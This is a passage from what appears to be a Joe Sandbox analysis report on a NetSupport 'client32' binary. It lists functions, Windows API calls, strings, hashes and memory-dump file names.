                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoadVersion
                                                                                                                                                                                                    • String ID: AudioCapture.dll
                                                                                                                                                                                                    • API String ID: 3209957514-2642820777
                                                                                                                                                                                                    • Opcode ID: 31160a4b39b369407e5d036c5ac5907d5ccb4198c4cf7eae390eb598ea28f55a
                                                                                                                                                                                                    • Instruction ID: de40c63e4a8a4fcde3dee2054331c33ed72f965d5ee4918db061c4a53d5809d0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31160a4b39b369407e5d036c5ac5907d5ccb4198c4cf7eae390eb598ea28f55a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AE01774E001638BF3029FB5884838E76D0A740699FC280B0ED22C0548FF6894808B31
                                                                                                                                                                                                    Function 11131420 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • KillTimer.USER32(?,00000001,?,11049246), ref: 11131446
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11131433
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1113142E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 2229609774-2830328467
                                                                                                                                                                                                    • Opcode ID: 205b0686d5236623331a90bfebdaad10eac3ab33d7e388880e187d4356a02918
                                                                                                                                                                                                    • Instruction ID: cbf25270b3b0651c58eed5869a3c9c02c4a96de395069bf87a5b764b24bbb751
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 205b0686d5236623331a90bfebdaad10eac3ab33d7e388880e187d4356a02918
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AD0A775A503659FD7209626EC85FC1B2E81F04718F048428F55567584D7B4E4C08755
                                                                                                                                                                                                    Function 1110F3E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1110F3EA
                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 1110F400
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FindMessageSendWindow
                                                                                                                                                                                                    • String ID: MSOfficeWClass
                                                                                                                                                                                                    • API String ID: 1741975844-970895155
                                                                                                                                                                                                    • Opcode ID: ea34c11dfc70926f791b8ca9d524af463d7492e780264d0d8388732ba29401cd
                                                                                                                                                                                                    • Instruction ID: 17eb5a188d88a84c71184668e46e9585b6c12665a03152ba016c754b78296158
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea34c11dfc70926f791b8ca9d524af463d7492e780264d0d8388732ba29401cd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BD0127035035977E6001AA2DD4EF99BB5CDB44B55F118024F706AA0C1DBB0B440876A
                                                                                                                                                                                                    Function 1101D040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMenu.USER32(00000000), ref: 1101D064
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 1101D053
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D04E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitLastMenuMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 1590435379-2830328467
                                                                                                                                                                                                    • Opcode ID: c7b93495bf7068046200dc23c21ea9923ab35a6c9bf7b9f7b571f0dbc23fbce4
                                                                                                                                                                                                    • Instruction ID: a479ae3ba71ad1bbfd929d5f192baf473b643c420dccf9ee561c4944f6f7f77e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7b93495bf7068046200dc23c21ea9923ab35a6c9bf7b9f7b571f0dbc23fbce4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51D022B5E0023AABC320E611ECC8FC6B2A85B00318F044468F12062000E678E480C380
                                                                                                                                                                                                    Function 11157350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MenuProp
                                                                                                                                                                                                    • String ID: OldMenu
                                                                                                                                                                                                    • API String ID: 601939786-3235417843
                                                                                                                                                                                                    • Opcode ID: bcb887040fc688b3d48361d640a276ef1f898a207ca6826fe873eb45f49f39ab
                                                                                                                                                                                                    • Instruction ID: 521654fc19124d4f771c6bc11addf53dd8358c346f2b3ea316e48a946e839c39
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcb887040fc688b3d48361d640a276ef1f898a207ca6826fe873eb45f49f39ab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96C0123260653D7782421A959D85ACEF76CAD162653008062FA10A2100F724551187EA